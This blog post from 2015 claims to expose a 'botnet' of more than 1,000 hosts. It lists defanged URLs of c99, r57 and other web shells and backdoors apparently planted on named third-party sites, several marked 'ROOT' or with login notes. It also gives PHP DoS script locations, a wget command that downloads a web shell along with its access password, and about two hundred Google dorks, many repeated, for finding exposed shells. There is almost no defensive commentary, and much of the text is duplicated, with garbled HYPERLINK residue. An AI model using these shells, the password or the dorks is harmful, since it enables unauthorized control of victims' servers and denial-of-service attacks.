Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

2 Hours OSINT Google Dork proof here is a 1000+ server/host botnet

7/24/2015

wget https://sites[.]google[.]com/site/uzopcybear/home/1n7ect[.]php?attredirects=0&d=1

Original pass akses : 1n73ction

http://www[.]hacking-cheat[.]com/2013/08/web-shell-1n73ction[.]html

http://pekanbaru-cyber4rt[.]blogspot[.]de/2013/10/web-shell-1n73ction[.]html

http://www[.]lichtvill[.]hu/index[.]php/recipes

http://osszefogas[.]kjmk[.]hu/sajto/strong[.]aspx?fdir=C%3A%2FInetpub%2Fwwwroot%2F – ASP DEAD

http://www[.]thieme[.]in/         – ROOT

http://baributz[.]hourb[.]com/source/index[.]php?dir=asp%2Bjsp%2F – jsp shell

http://osszefogas[.]kjmk[.]hu/sajto/strong[.]aspx?fdir=C%3A%2FInetpub%2F – DEAD

http://www[.]curesurgical[.]com/

http://www[.]advect[.]se/?q=c99

http://mikeybeck[.]com/hacking/N3tShell[.]html

http://www[.]basket-blog[.]com/sh3llZ/c100/c100[.]php

http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f HYPERLINK “http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f&f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac&ft=info&base64=4&d=/boot/”& HYPERLINK “http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f&f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac&ft=info&base64=4&d=/boot/”f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac HYPERLINK “http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f&f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac&ft=info&base64=4&d=/boot/”& HYPERLINK “http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f&f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac&ft=info&base64=4&d=/boot/”ft=info HYPERLINK “http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f&f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac&ft=info&base64=4&d=/boot/”& HYPERLINK “http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f&f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac&ft=info&base64=4&d=/boot/”base64=4 HYPERLINK “http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f&f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac&ft=info&base64=4&d=/boot/”& HYPERLINK “http://www[.]halsema[.]org/cgi-bin/anyboard/abmasterd/main/c99[.]PHP?act=f&f=[.]vmlinuz-2[.]6[.]18-348[.]6[.]1[.]el5[.]hmac&ft=info&base64=4&d=/boot/”d=%2Fboot%2F

http://www[.]basesoccer[.]com/albozz[.]html

http://bydiana[.]com[.]br/wehere[.]php

PHPDoS List

http://www[.]fitsoul-fitbody[.]com/blog/wp-admin/includes/ddos[.]php

http://sumanresidency[.]com/waw[.]php

http://www[.]fitsoul-fitbody[.]com/blog/wp-admin/includes/ddos[.]php

http://zabbic[.]com/index[.]php?help/terms

http://habbzone[.]free[.]fr/divers/ddos/

http://psyko[.]joker[.]free[.]fr/Logiciels/PHP[.]DoS/PHP[.]DoS[.]v1[.]8[.]ZeroDayExile[.]com/

https://www[.]abcrestaurant[.]com/includes/modules/

http://hdknet[.]co[.]jp/images/library/Image/icons/

http://deransivalingam[.]weebly[.]com/hidden[.]html

http://www[.]geocities[.]ws/biily_cyber/

http://riscodrop[.]webs[.]com/

http://pakher[.]besaba[.]com/

http://zmickz[.]free[.]fr/

http://betatesterforme[.]blogspot[.]nl/

http://www[.]sepana[.]com/Sepana/DoS

http://ngixn[.]url[.]ph/ddos[.]php

http://deson[.]host[.]sk/

http://j0ker066[.]somee[.]com/

http://ludicare[.]free[.]fr/

http://xkillerhackerx[.]blogspot[.]ro/

http://seal-xplorer[.]blogspot[.]ro/

http://mobilecommission[.]net/

http://echolove5[.]atspace[.]co[.]uk/ddos[.]php

http://habbzone[.]free[.]fr/divers/ddos/

http://localhost12[.]blogspot[.]com/

http://factyua[.]tk/ – captcha

http://www[.]alayinizyalan[.]com/

http://www[.]lnmker[.]club/codedbyexe/

http://www[.]duiohp[.]club/codedbyexe/

http://amunisi-id[.]com/ddos/

http://dostek[.]tk/a/

http://slowry[.]host22[.]com/abc[.]php

http://www[.]kebecradiomix[.]org/phpstart[.]html

http://soroda[.]com/

http://www[.]abs-tech[.]com/admin/modulos/editor/upload/

Jarem Shells

http://www[.]myvocabulary[.]com/images/staff/b5-4f50c3454php%20backdoor[.]php

http://www[.]intranet[.]uiltucs[.]it/admin/images/documenti/n27/backdoor[.]php?action=up

http://www[.]myvocabulary[.]com/images/staff/b5-4f50c3454php%20backdoor[.]php?action=listing\

BizShell

http://www[.]iask[.]co[.]il/?act=feedback HYPERLINK “http://www[.]iask[.]co[.]il/?act=feedback&d=/var/www/websites/iask2/”& HYPERLINK “http://www[.]iask[.]co[.]il/?act=feedback&d=/var/www/websites/iask2/”d=%2Fvar%2Fwww%2Fwebsites%2Fiask2%2F

http://ethics[.]iit[.]edu/ecodes/node/5636?act=f HYPERLINK “http://ethics[.]iit[.]edu/ecodes/node/5636?act=f&f=servicesi[.]gif&ft=edit&white=1&d=/home/ethics-t/public_html/images/”& HYPERLINK “http://ethics[.]iit[.]edu/ecodes/node/5636?act=f&f=servicesi[.]gif&ft=edit&white=1&d=/home/ethics-t/public_html/images/”f=servicesi[.]gif HYPERLINK “http://ethics[.]iit[.]edu/ecodes/node/5636?act=f&f=servicesi[.]gif&ft=edit&white=1&d=/home/ethics-t/public_html/images/”& HYPERLINK “http://ethics[.]iit[.]edu/ecodes/node/5636?act=f&f=servicesi[.]gif&ft=edit&white=1&d=/home/ethics-t/public_html/images/”ft=edit HYPERLINK “http://ethics[.]iit[.]edu/ecodes/node/5636?act=f&f=servicesi[.]gif&ft=edit&white=1&d=/home/ethics-t/public_html/images/”& HYPERLINK “http://ethics[.]iit[.]edu/ecodes/node/5636?act=f&f=servicesi[.]gif&ft=edit&white=1&d=/home/ethics-t/public_html/images/”white=1 HYPERLINK “http://ethics[.]iit[.]edu/ecodes/node/5636?act=f&f=servicesi[.]gif&ft=edit&white=1&d=/home/ethics-t/public_html/images/”& HYPERLINK “http://ethics[.]iit[.]edu/ecodes/node/5636?act=f&f=servicesi[.]gif&ft=edit&white=1&d=/home/ethics-t/public_html/images/”d=%2Fhome%2Fethics-t%2Fpublic_html%2Fimages%2F

http://web[.]cc[.]ncu[.]edu[.]tw/~985002529/r57[.]php?act=f HYPERLINK “http://web[.]cc[.]ncu[.]edu[.]tw/~985002529/r57[.]php?act=f&f=r57[.]php&ft=phpsess&d=/net/univ/98/cse/985002529/public_html/”& HYPERLINK “http://web[.]cc[.]ncu[.]edu[.]tw/~985002529/r57[.]php?act=f&f=r57[.]php&ft=phpsess&d=/net/univ/98/cse/985002529/public_html/”f=r57[.]php HYPERLINK “http://web[.]cc[.]ncu[.]edu[.]tw/~985002529/r57[.]php?act=f&f=r57[.]php&ft=phpsess&d=/net/univ/98/cse/985002529/public_html/”& HYPERLINK “http://web[.]cc[.]ncu[.]edu[.]tw/~985002529/r57[.]php?act=f&f=r57[.]php&ft=phpsess&d=/net/univ/98/cse/985002529/public_html/”ft=phpsess HYPERLINK “http://web[.]cc[.]ncu[.]edu[.]tw/~985002529/r57[.]php?act=f&f=r57[.]php&ft=phpsess&d=/net/univ/98/cse/985002529/public_html/”& HYPERLINK “http://web[.]cc[.]ncu[.]edu[.]tw/~985002529/r57[.]php?act=f&f=r57[.]php&ft=phpsess&d=/net/univ/98/cse/985002529/public_html/”d=%2Fnet%2Funiv%2F98%2Fcse%2F985002529%2Fpublic_html%2F

http://www[.]basket-blog[.]com/sh3llZ/c100/c100[.]php

C99 Shells

http://corz[.]org/corz/c99[.]ph

http://www[.]daccassociates[.]com/Files/HA[.]php?

http://rockcliffeparkatfairwinds[.]ca/images/37[.]php

http://apollo[.]eed[.]usv[.]ro/~cocu_c/shell/cgi[.]php?

http://grandvrock[.]ch/e107/e107_images/avatars/google[.]gif[.]php

http://www[.]le-pommier[.]jp/news/data/upfile/33-5[.]php

http://uniweld[.]com[.]br/imagens_produtos/c99[.]php

http://menfun[.]org/images/c99[.]php

http://www[.]vps[.]ns[.]ac[.]rs/nastavnici/Materijal/mat6303[.]php

http://grandvrock[.]ch/e107/e107_images/avatars/google[.]gif[.]php

http://rockcliffeparkatfairwinds[.]ca/images/37[.]php

 Saudi Shell

http://forumhotelpecs[.]hu/gasztroker_uj/data/termekek/11623sdk-16l[.]php?sws=rname HYPERLINK “http://forumhotelpecs[.]hu/gasztroker_uj/data/termekek/11623sdk-16l[.]php?sws=rname&file=29308wk2977[.]jpg&dir=/var/www/gasztroker_uj/data/termekek”& HYPERLINK “http://forumhotelpecs[.]hu/gasztroker_uj/data/termekek/11623sdk-16l[.]php?sws=rname&file=29308wk2977[.]jpg&dir=/var/www/gasztroker_uj/data/termekek”file=29308wk2977[.]jpg HYPERLINK “http://forumhotelpecs[.]hu/gasztroker_uj/data/termekek/11623sdk-16l[.]php?sws=rname&file=29308wk2977[.]jpg&dir=/var/www/gasztroker_uj/data/termekek”& HYPERLINK “http://forumhotelpecs[.]hu/gasztroker_uj/data/termekek/11623sdk-16l[.]php?sws=rname&file=29308wk2977[.]jpg&dir=/var/www/gasztroker_uj/data/termekek”dir=/var/www/gasztroker_uj/data/termekek

http://www[.]linux-host[.]org/galicia/bib/show_all_articles[.]php?id=684 – Broke

http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search= HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″& HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″sort= HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″& HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″dir=DESC HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″& HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″type_page=html HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″& HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″export=-1 HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″& HYPERLINK “http://palatin[.]as/tracker/print_all_bug_page_word[.]php?search=&sort=&dir=DESC&type_page=html&export=-1&show_flag=0″show_flag=0 – broke

http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f HYPERLINK “http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f&f=1[.]php&ft=info&base64=4&d=D:/XVRT/windowssharedhosting[.]com[.]es/Html/php/1/”& HYPERLINK “http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f&f=1[.]php&ft=info&base64=4&d=D:/XVRT/windowssharedhosting[.]com[.]es/Html/php/1/”f=1[.]php HYPERLINK “http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f&f=1[.]php&ft=info&base64=4&d=D:/XVRT/windowssharedhosting[.]com[.]es/Html/php/1/”& HYPERLINK “http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f&f=1[.]php&ft=info&base64=4&d=D:/XVRT/windowssharedhosting[.]com[.]es/Html/php/1/”ft=info HYPERLINK “http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f&f=1[.]php&ft=info&base64=4&d=D:/XVRT/windowssharedhosting[.]com[.]es/Html/php/1/”& HYPERLINK “http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f&f=1[.]php&ft=info&base64=4&d=D:/XVRT/windowssharedhosting[.]com[.]es/Html/php/1/”base64=4 HYPERLINK “http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f&f=1[.]php&ft=info&base64=4&d=D:/XVRT/windowssharedhosting[.]com[.]es/Html/php/1/”& HYPERLINK “http://windowssharedhosting[.]com[.]es/php/1/fso[.]php?act=f&f=1[.]php&ft=info&base64=4&d=D:/XVRT/windowssharedhosting[.]com[.]es/Html/php/1/”d=D%3A\XVRT\windowssharedhosting[.]com[.]es\Html\php\1\

Lolipop

http://www[.]financialmilestones[.]com[.]au/myfiles/uploads/lol[.]html

Egy Spider

http://www[.]modestofood[.]com/images/cms_editor/1308262980accoont[.]php[.]php – l/p

http://www[.]homeofbedding[.]com[.]au/ebay/egy_spider[.]php l/p

http://www[.]hheconline[.]com/images/products/big/HHEC115511sad[.]php

http://www[.]tele[.]ro/images/cc[.]php

http://www[.]dheirawandt666[.]co[.]vu/

[*] Dork

Encontrando shell c99 upadas ;

001[.]safe-mode: off (not secure) drwxrwxrwx c99shell

002[.]inurl:c99[.]txt

003[.]inurl:c99[.]php uid=0(root)

004[.]root c99[.]php

005[.]”Captain Crunch Security Team” inurl:c99

006[.]download c99[.]php

007[.]inurl:c99[.]php

008[.]allinurl: c99[.]php

009[.]allinurl: c99[.]txt

010[.]inurl:”/c99[.]php”

011[.]inurl:”c99[.]php” c99shell

012[.]inurl:c99[.]php uid=0(root)

013[.]c99shell powered by admin

014[.]inurl:”/c99[.]php”

015[.]c99 shell v[.]1[.]0 (roots)

016[.]allintitle: “c99shell”

017[.]inurl:”c99[.]php

018[.]allinurl: “c99[.]php”

019[.]intitle:C99Shell v[.] 1[.]0 pre-release +uname

020[.]intitle:C99Shell v[.] 1[.]0 pre-release +uname

021[.]allinurl: “c99[.]php”

022[.]inurl:”c99[.]php”

023[.]inurl:”c99[.]php”

024[.]inurl:”c99[.]php” c99shell

025[.]inurl:”c99[.]php”

026[.]inurl:”/c99[.]php

027[.]inurl:c99[.]php?

028[.]inurl:/c99[.]php+uname

029[.]allinurl:”c99[.]php”

030[.]inurl:”c99[.]php”

031[.]allinurl:c99[.]php?

032[.]”inurl:c99[.][.]php”

033[.]allinurl:c99[.]php

034[.]c99shell [file on secure ok ]?

035[.]inurl:c99[.]php

036[.]powered by Captain Crunch Security Team

037[.]allinurl:c99[.]php

038[.]”c99[.]php” filetype:php

039[.]allinurl:c99[.]php

040[.]inurl:c99shell[.]php

041[.]allinurl:[.]c99[.]php

042[.]”inurl:c99[.]php”

043[.]c99[.] PHP-code Feedback Self remove

044[.]allinurl:c99[.]php

045[.]download c99[.]txt

046[.]inurl:c99shell[.]txt

047[.]allinurl: “c99[.]php”

048[.]allinurl:c99[.]php

049[.]allinurl:c99[.]php

050[.]c99shell

051[.]inurl:c99[.]php

052[.]intitle:C99Shell v[.] 1[.]0 pre-release +uname

053[.]allinurl:”c99[.]php”

054[.]inurl:c99[.]php

055[.]safe-mode: off (not secure) drwxrwxrwx c99shell

056[.]inurl:/c99[.]php

057[.]inurl:”c99[.]php”

058[.]inurl:c99[.]php

059[.]c99[.]php download

060[.]inurl:”c99[.]php”

061[.]inurl:/c99[.]php

062[.]inurl:”c99[.]php?”

063[.]files/c99[.]php

064[.]c99shell filetype:php -echo

065[.]c99shell powered by admin

066[.]inurl:”c99[.]php”

067[.]inurl:c99[.]php uid=0(root)

068[.]inurl:”c99[.]php”

069[.]inurl:”/c99[.]php” intitle:”C99shell”

070[.]C99Shell v[.] 1[.]0 pre-release build #5

071[.]inurl:c99[.]php

072[.]inurl:c99[.]php

073[.]–[ c99shell v[.] 1[.]0 pre-release build #16

074[.]c99shell linux infong

075[.]C99Shell v[.] 1[.]0 pre-release build

076[.]!C99Shell v[.] 1[.]0 beta!

077[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

078[.]!c99shell v[.] 1+Safe-mode: OFF (not secure)

079[.]”C99Shell v[.] 1[.]0 pre-release build “

080[.]intitle:c99shell +filetype:php

081[.]intitle:C99Shell v[.] 1[.]0 pre-release +uname

082[.]”Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

083[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

084[.]intitle:!C99Shell v[.] 1[.]0 pre-release build #16! root

085[.]!C99Shell v[.] 1[.]0 pre-release build #5!

086[.]C99Shell v[.] 1[.]0 pre-release build #16!

087[.]intitle:c99shell intext:uname

088[.]allintext:C99Shell v[.] 1[.]0 pre-release build #12

089[.]c99shell v[.] 1[.]0 pre-release build #16

090[.]–[ c99shell v[.] 1[.]0 pre-release build #15 | Powered by ]–

091[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

092[.]”c99shell v 1[.]0″

093[.]ftp apache inurl:c99[.]php

094[.]c99shell+v[.]+1[.]0 16

095[.]C99Shell v[.] 1[.]0 pre-release build #16 download

096[.]intitle:c99shell “Software: Apache”

097[.]allinurl: c99[.]php

098[.]allintext: Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove

099[.]

100[.]Logout

101[.]powered by Captain Crunch Security Team

102[.]!C99Shell v[.] 1[.]0 pre-release build #5!

103[.]c99shell v[.] 1[.]0 release security

104[.]c99shell v[.] 1[.]0 pre-release build

105[.]c99shell [file on secure ok ]?

106[.]C99Shell v[.] 1[.]3

107[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

108[.]inurl:c99[.]php uid=0(root)

109[.]powered by Captain Crunch Security Team

110[.]C99Shell v[.] 1[.]0 pre-release build #16

111[.]c99shell[on file]ok

112[.]c99shell[file on ]ok

113[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

114[.]”C99Shell v[.] 1[.]0 pre”

115[.]=C99Shell v[.] 1[.]0 pre-release

116[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

117[.]c99shell v[.] pre-release build

118[.]inurl:c99[.]php c99 shell

119[.]inurl:c99[.]php c99 shell

120[.]powered by Captain Crunch Security Team

121[.]C99Shell v[.] 1[.]0 pre-release build #16!

122[.]C99Shell v[.] 1[.]0 pre-release build #16 administrator

123[.]intitle:c99shell filetype:php

124[.]powered by Captain Crunch Security Team

125[.]powered by Captain Crunch Security Team

126[.]C99Shell v[.] 1[.]0 pre-release build #12

127[.]c99shell v[.]1[.]0

128[.]”c99shell v[.] 1[.]0 pre-release build”

129[.]inurl:”c99[.]php” filetype:php

130[.]”c99shell v[.] 1[.]0 “

131[.]ok c99[.]php

132[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

133[.]c99shell v[.] 1[.]0 pre-release build #16 |

134[.]!C99Shell v[.] 1[.]0 pre-release build #5!

135[.]!C99Shell v[.] 1[.]0 pre-release build #5!

136[.]powered by Captain Crunch Security Team

137[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

138[.]powered by Captain Crunch Security Team

139[.]C99Shell v[.] 1[.]0 pre-release

140[.]inurl:c99[.]php ext:php

141[.]allinurl:”c99[.]php”

142[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

143[.]powered by Captain Crunch Security Team

144[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

145[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout”

146[.]C99Shell v[.] 1[.]0 pre-release build #16 software apache

147[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

148[.]”c99shell v 1[.]0″

149[.]allintitle: C99shell filetype:php

150[.]C99Shell v[.] 1[.]0 pre-release build #16!

151[.]”c99shell v[.] 1[.]0 pre-release”

152[.]c99shell v[.] 1[.]0 pre-release build #5

153[.]allinurl:”c99[.]php” filetype:php

154[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

155[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

156[.]!C99Shell v[.] 1[.]0 pre-release build #16!

157[.]intitle:C99Shell v[.] 1[.]0 pre-release +uname

158[.]c99shell v[.] 1[.]0

159[.]–[ c99shell v[.] 1[.]0 pre-release build #16 powered by Captain Crunch Security Team | ]–

160[.]inurl:”/c99[.]php”

161[.]c99shell +uname

162[.]c99shell php + uname

163[.]c99shell php + uname

164[.]–[ c99shell v[.] 1[.]0 pre-release build #16 powered by Captain Crunch Security Team | ]–

165[.]!C99Shell v[.] 1[.]0 pre-release build #5!

166[.]C99Shell v[.]1[.]0 pre-release

167[.]Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

168[.]intitle:c99shell filetype:php

169[.]”Encoder Tools Proc[.] FTP brute”

170[.]”c99″ filetype:php intext:”Safe-Mode: OFF”

171[.]c99shell v[.] 1[.]0 pre

172[.]intitle:c99shell uname -bbpress

173[.]intitle:”index[.]of” c99[.]php

174[.]inurl:admin/files/

175[.]intitle:”index of /” “c99[.]php”

176[.]intitle:”index of” intext:c99[.]php

177[.]intitle:index[.]of c99[.]php

178[.]intitle:”index of” + c99[.]php

179[.]intitle:index/of file c99[.]php

180[.]intitle:index/of file c99[.]php

181[.]index of /admin/files/

182[.]intitle:”Index of/”+c99[.]php

183[.]c99[.]php “intitle:Index of “

184[.]c99[.]php “intitle:Index of “

185[.]c99[.]php “intitle:Index of “

186[.]intitle:index[.]of c99[.]php

187[.]img/c99[.]php

188[.]intitle:index[.]of c99[.]php

189[.]img[.]c99[.]php

190[.]intitle:”Index of/”+c99[.]php

191[.]”index of /” c99[.]php

192[.]intitle:”Index of” c99[.]php

193[.]”index of” c99[.]php

194[.]”Index of/”+c99[.]php

inurl:c99[.]php

inurl:”c99[.]php” c99shell

inurl:c99[.]php uid=0(root)

c99shell powered by admin

c99shell powered by admin

inurl:”/c99[.]php”

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

c99 shell v[.]1[.]0 (roots)

inurl:c99[.]php

allintitle: “c99shell”

inurl:”c99[.]php

inurl:”c99[.]php

allinurl: “c99[.]php”

inurl:c99[.]php

intitle:C99Shell v[.] 1[.]0 pre-release +uname

intitle:C99Shell v[.] 1[.]0 pre-release +uname

allinurl: “c99[.]php”

inurl:c99[.]php

inurl:”c99[.]php”

inurl:”c99[.]php”

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

inurl:”c99[.]php” c99shell

inurl:c99[.]php

inurl:”c99[.]php”

allinurl:c99[.]php

inurl:”/c99[.]php

inurl:c99[.]php?

inurl:/c99[.]php+uname

allinurl:”c99[.]php”

allinurl:c99[.]php

inurl:”c99[.]php”

inurl:”c99[.]php”

allinurl:c99[.]php

allinurl:c99[.]php?

allinurl:c99[.]php?

allinurl:c99[.]php?

“inurl:c99[.][.]php”

allinurl:c99[.]php

c99shell [file on secure ok ]?

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

powered by Captain Crunch Security Team

allinurl:c99[.]php

“c99[.]php” filetypehp

allinurl:c99[.]php

inurl:c99[.]php

allinurl:[.]c99[.]php

“inurl:c99[.]php”

c99[.] PHP-code Feedback Self remove

allinurl:c99[.]php

download c99[.]php

allinurl:c99[.]php

inurl:c99[.]php

allinurl: “c99[.]php”

allinurl:c99[.]php

allinurl:c99[.]php

c99shell

inurl:c99[.]php

inurl:c99[.]php

intitle:C99Shell v[.] 1[.]0 pre-release +uname

allinurl:”c99[.]php”

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

inurl:c99[.]php

safe-mode: off (not secure) drwxrwxrwx c99shell

inurl:/c99[.]php

inurl:”c99[.]php”

inurl:c99[.]php

inurl:c99[.]php

c99[.]php download

inurl:c99[.]php

inurl:”c99[.]php”

inurl:/c99[.]php

inurl:”c99[.]php?”

inurl:c99[.]php

inurl:c99[.]php

files/c99[.]php

c99shell filetypehp -echo

c99shell powered by admin

inurl:c99[.]php

inurl:c99[.]php

inurl:”c99[.]php”

inurl:c99[.]php uid=0(root)

allinurl:c99[.]php

inurl:”c99[.]php”

inurl:”c99[.]php”

inurl:”/c99[.]php” intitle:”C99shell”

inurl:”/c99[.]php” intitle:”C99shell”

inurl:”/c99[.]php” intitle:”C99shell”

C99Shell v[.] 1[.]0 pre-release build #5

inurl:c99[.]php

inurl:c99[.]php

–[ c99shell v[.] 1[.]0 pre-release build #16

c99shell linux infong

c99shell linux infong

C99Shell v[.] 1[.]0 pre-release build

!C99Shell v[.] 1[.]0 beta!

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

!c99shell v[.] 1+Safe-mode: OFF (not secure)

“C99Shell v[.] 1[.]0 pre-release build “

intitle:c99shell +filetypehp

inurl:c99[.]php

intitle:C99Shell v[.] 1[.]0 pre-release +uname

“Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

intitle:!C99Shell v[.] 1[.]0 pre-release build #16! root

!C99Shell v[.] 1[.]0 pre-release build #5!

inurl:”c99[.]php”

C99Shell v[.] 1[.]0 pre-release build #16!

c99shell v[.] 1[.]0 pre-release build #16

intitle:c99shell intext:uname

allintext:C99Shell v[.] 1[.]0 pre-release build #12

c99shell v[.] 1[.]0 pre-release build #16

–[ c99shell v[.] 1[.]0 pre-release build #15 | Powered by ]–

allinurl: “c99[.]php”

allinurl: “c99[.]php”

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

“c99shell v 1[.]0”

ftp apache inurl:c99[.]php

c99shell+v[.]+1[.]0 16

C99Shell v[.] 1[.]0 pre-release build #16 download

intitle:c99shell “Software: Apache”

allinurl: c99[.]php

allintext: Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove

Logout

powered by Captain Crunch Security Team

powered by Captain Crunch Security Team

!C99Shell v[.] 1[.]0 pre-release build #5!

c99shell v[.] 1[.]0 release security

c99shell v[.] 1[.]0 pre-release build

inurl:c99[.]php

c99shell [file on secure ok ]?

C99Shell v[.] 1[.]3

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

inurl:c99[.]php uid=0(root)

powered by Captain Crunch Security Team

C99Shell v[.] 1[.]0 pre-release build #16

c99shell[on file]ok

c99shell[file on ]ok

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

inurl:c99[.]php

“C99Shell v[.] 1[.]0 pre”

=C99Shell v[.] 1[.]0 pre-release

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

c99shell v[.] pre-release build

inurl:c99[.]php c99 shell

inurl:c99[.]php c99 shell

powered by Captain Crunch Security Team

inurl:c99[.]php

inurl:c99[.]php

!C99Shell v[.] 1[.]0 pre-release build #5!

intitle:”c99shell” filetypehp root

intitle:”c99shell” Linux infong 2[.]4

C99Shell v[.] 1[.]0 beta !

C99Shell v[.] 1[.]0 pre-release build #

inurl:”c99[.]php”

allintext:C99Shell v[.] 1[.]0 pre-release build #12

“C99Shell v[.] 1[.]0 pre”

powered by Captain Crunch Security Team

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

inurl:/c99[.]php?

allinurl:c99[.]php

intitle:C99Shell pre-release

inurl:”c99[.]php”

powered by Captain Crunch Security Team

inurl:c99[.]php

C99Shell v[.] 1[.]0 pre-release build #16!

allinurl:c99[.]php

C99Shell v[.] 1[.]0 pre-release build #16 administrator

intitle:c99shell filetypehp

powered by Captain Crunch Security Team

powered by Captain Crunch Security Team

C99Shell v[.] 1[.]0 pre-release build #12

c99shell v[.]1[.]0

allinurl:c99[.]php

“c99shell v[.] 1[.]0 pre-release build”

inurl:”c99[.]php” filetypehp

“c99shell v[.] 1[.]0 “

ok c99[.]php

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

c99shell v[.] 1[.]0 pre-release build #16 |

!C99Shell v[.] 1[.]0 pre-release build #5!

!C99Shell v[.] 1[.]0 pre-release build #5!

allinurl:/c99[.]php

powered by Captain Crunch Security Team

inurl:c99[.]php

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

inurl:c99[.]php

powered by Captain Crunch Security Team

inurl:c99[.]php

C99Shell v[.] 1[.]0 pre-release

inurl:c99[.]php

inurl:c99[.]php exthp

inurl:”c99[.]php”

allinurl:”c99[.]php”

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

powered by Captain Crunch Security Team

Encoder Tools Proc[.] FTP brute Sec[.] SQL PHP-code Update Feedback Self remove Logout

